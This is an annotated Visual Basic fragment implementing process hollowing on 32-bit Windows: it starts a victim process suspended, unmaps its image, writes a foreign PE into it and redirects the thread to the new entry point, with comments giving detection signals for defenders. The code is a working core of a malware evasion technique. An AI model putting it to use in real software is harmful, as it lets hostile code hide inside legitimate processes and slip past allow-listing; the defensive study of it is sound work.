' Fragment from inside a larger Function: the declarations, the parsing of
' abExeFile into idh/inh, the Protect() helper and the ClearProcess label are
' not shown here.
' What it does: starts sVictim suspended, unmaps the image the loader mapped,
' writes the PE held in abExeFile into the child and points the primary thread
' at that image's entry point. This is the sequence catalogued as process
' hollowing (MITRE ATT&CK T1055.012).
' Defender view: the process name and on-disk path stay those of sVictim while
' the executing code comes from abExeFile, so name/path allow-listing does not
' see it. The signal is the ordered chain below against a freshly created
' child: suspended creation -> remote unmap -> remote alloc/write/protect ->
' SetThreadContext -> ResumeThread. Sysmon Event ID 25 (ProcessTampering) and
' comparing a process's in-memory image with its file on disk both target
' this mismatch.
'
' Step 1: create the child with CREATE_SUSPENDED so its primary thread has not
' run any code yet.
- If CreateProcess(vbNullString, sVictim, 0, 0, False, CREATE_SUSPENDED, 0, 0, si, pi) = 0 Then
- MsgBox "Can not start victim process!", vbCritical
- Exit Function
- End If
' Step 2: fetch the primary thread's register context. CONTEXT86_INTEGER is
' declared elsewhere; presumably it selects the integer registers - confirm.
- context.ContextFlags = CONTEXT86_INTEGER
- If GetThreadContext(pi.hThread, context) = 0 Then GoTo ClearProcess
' Reads 4 bytes at EBX+8 in the child into addr. NOTE(review): on 32-bit
' Windows this is presumably PEB.ImageBaseAddress of the new process; the
' fragment does not say so. The Ebx/Eax registers and 4-byte pointer size make
' this x86-only.
- Call ReadProcessMemory(pi.hProcess, ByVal context.Ebx + 8, addr, 4, 0)
- If addr = 0 Then GoTo ClearProcess
' Step 3: unmap the view at addr in the child. A nonzero return is treated as
' failure. A cross-process unmap of a main image is rare in benign software.
- If ZwUnmapViewOfSection(pi.hProcess, addr) Then GoTo ClearProcess
' Step 4: allocate SizeOfImage bytes in the child at the ImageBase taken from
' inh. Pages start as PAGE_READWRITE; per-section protection is set in the
' loop below.
- ImageBase = VirtualAllocEx(pi.hProcess, ByVal inh.OptionalHeader.ImageBase, inh.OptionalHeader.SizeOfImage, MEM_RESERVE Or MEM_COMMIT, PAGE_READWRITE)
- If ImageBase = 0 Then GoTo ClearProcess
' Step 5: copy the PE headers (first SizeOfHeaders bytes of abExeFile).
- Call WriteProcessMemory(pi.hProcess, ByVal ImageBase, abExeFile(0), inh.OptionalHeader.SizeOfHeaders, ret)
' lOffset = file offset of the section table (it follows the NT headers).
- lOffset = idh.e_lfanew + Len(inh)
' Step 6: for each section, read its header into ish, write its raw data at
' ImageBase + VirtualAddress, then apply the protection that Protect()
' (defined elsewhere) derives from the section characteristics. addr is reused
' here to receive the previous protection value.
- For i = 0 To inh.FileHeader.NumberOfSections - 1
- CopyMemory ish, abExeFile(lOffset + i * Len(ish)), Len(ish)
- Call WriteProcessMemory(pi.hProcess, ByVal ImageBase + ish.VirtualAddress, abExeFile(ish.PointerToRawData), ish.SizeOfRawData, ret)
- Call VirtualProtectEx(pi.hProcess, ByVal ImageBase + ish.VirtualAddress, ish.VirtualSize, Protect(ish.characteristics), addr)
- Next i
' Step 7: write the new base back to the EBX+8 slot read in step 2, so the
' child's own record of its image base matches the written image.
- Call WriteProcessMemory(pi.hProcess, ByVal context.Ebx + 8, ImageBase, 4, ret)
' Step 8: set Eax to the new image's entry point and apply the context.
' NOTE(review): presumably the suspended x86 thread takes its start address
' from EAX - confirm. A SetThreadContext on a thread that has never run,
' followed directly by ResumeThread, is the last link of the chain to alert on.
- context.Eax = ImageBase + inh.OptionalHeader.AddressOfEntryPoint
- Call SetThreadContext(pi.hThread, context)
- Call ResumeThread(pi.hThread)